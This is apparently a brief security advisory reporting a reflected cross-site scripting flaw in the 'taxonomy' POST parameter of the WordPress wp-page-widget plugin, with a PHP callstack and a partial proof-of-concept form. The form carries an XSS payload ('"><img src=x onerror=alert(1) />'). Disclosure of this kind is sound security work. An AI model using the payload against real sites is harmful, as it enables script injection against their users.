Hello,
1. Reflected Cross-Site Scripting (XSS)
Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection)
Method: POST
Vulnerable parameters: taxonomy
Example PHP callstack:
pw_returnTaxonomyWidget [/wp-page-widget/wp-page-widgets.php:862]
Verification:
--
<input type="text" name="taxonomy" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,